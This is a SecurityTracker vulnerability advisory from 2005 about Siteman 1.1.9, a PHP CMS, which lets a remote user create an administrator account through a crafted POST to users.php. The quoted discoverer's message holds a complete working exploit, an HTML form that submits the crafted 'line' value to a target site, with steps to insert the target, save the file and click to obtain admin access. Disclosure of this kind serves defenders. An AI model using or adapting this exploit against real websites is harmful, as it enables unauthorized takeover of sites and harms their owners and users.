SecurityTracker.com
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 


Category:   Application (Forum/Board/Portal)  >   Siteman Vendors:   sitem.sourceforge.net
Siteman Lets Remote Users Create Administrative Accounts
SecurityTracker Alert ID:  1012951
SecurityTracker URL:  http://securitytracker.com/id/1012951
CVE Reference:   GENERIC-MAP-NOMATCH   (Links to External Site)
Date:  Jan 20 2005
Impact:   User access via network
Exploit Included:  Yes  
Version(s): 1.1.9
Description:   amironline452 of the Alpha Hackers Digital Security Team reported an authentication vulnerability in Siteman. A remote user can gain administrative access.

A remote user can submit a specially crafted HTTP POST request to the 'users.php' script to add a user with administrative privileges. A specially crafted 'line' parameter submitted via the 'docreate' function will add a user account with level '5' privileges (i.e., administrator privileges.

A demonstration exploit value [that creates an account with a username of 'amir452' and password of 'amir452'] is of the following format:

amir452|347a9a8a8d3f364f0bdb82c4208a3207|5|amir452@amir452.com|amir452|1105956827|

Impact:   A remote user can create an administrative account.
Solution:   No solution was available at the time of this entry.
Vendor URL:  sitem.sourceforge.net/ (Links to External Site)
Cause:   Authentication error
Underlying OS:  Linux (Any), UNIX (Any), Windows (Any)

Message History:   None.


 Source Message Contents

Subject:  I Found a Vulnerability in ...


New CSS vulnerability in Siteman v1.1.9

Discovered By amironline452 (amiroline452@alphahackers.com)
By Alpha Hackers Digital Security Team
www.alphahackers.com
www.amironline452.tk

----------------------------------------------------------
abbreviation of Siteman CMS:

Siteman is a CMS that works without MySQL DataBase and is written by the PHP.
Someone who is not that familiar and professionally with website management can manage a
website by the CMS fully.
For furthermore information contact to these addresses:

http://sitem.sourceforge.net/
http://sourceforge.net/projects/sitem/

----------------------------------------------------------

HTML Code for CSS:

<html>
<b>These data were recorded.</b><br /><br /><table cellspacing="0" cellpadding="2"><tr><td>
Username(Use this, and not your display name, when logging in)
</td><td align="right">amir452</td></tr><tr><td>Password
</td><td align="right"><form>
<select><option>Click to show password</option>
     <option>amir452</option></select></form></td></tr><tr><td>
Secret Question (Asked when you forget your password)
</td><td align="right">amir452</td></tr><tr><td>Answer to secret question
</td><td align="right"><form>

<select>
<option>Click to show answer</option>
<option>amir452</option>
</select></form>
</td></tr><tr><td>Display name</td><td align="right">amir452</td></tr><tr><td>
Member Level</td><td align="right"><b>5</b> (Admin)
</td></tr><tr><td>email</td><td align="right">amir452@amir452.com</td></tr>
<tr><td>Hide my email adress</td><td align="right">no
</td></tr><tr><td>Forum Signature
</td><td align="right">hackers</td></table><br /><br />Is this correct?<br />
<table cellspacing="0" cellpadding="3"><tr><td>
     

<form action="users.php?do=new" method="post"><input type="submit" value="no" /></form></td><td>

<form action="http://xxx/users.php?do=docreate " method="post">
     <input type="hidden" name="line" value=" amir452|347a9a8a8d3f364f0bdb82c4208a3207|5|amir452@amir452.com|amir452|1105956827|amir452|347a9a8a8d3f364f0bdb82c4208a3207|0|0|0|hackers" />
<input type="submit" value="yes" /></form></html>

----------------------------------------------------------

Change xxx with your target website, then save this code with .html postfix.
then you must click on the yes button for making an account on the website with the admin (5) class.
this account user is: amir452
and the password for this account is: amir452

With special thanx to shoaliesefid7 (whiteknight@alphahackers.com) the admin of the
Alpha Hackers Digital Security Team (www.alphahackers.com) and the other 
members of this Team.

Have Fun 




________________________________________________________________
Sent via the WebMail system at alphahackers.com


 
                   
 
 


Go to the Top of This SecurityTracker Archive Page





Home   |    View Topics   |    Search   |    Contact Us

This web site uses cookies for web analytics. Learn More

Copyright 2020, SecurityGlobal.net LLC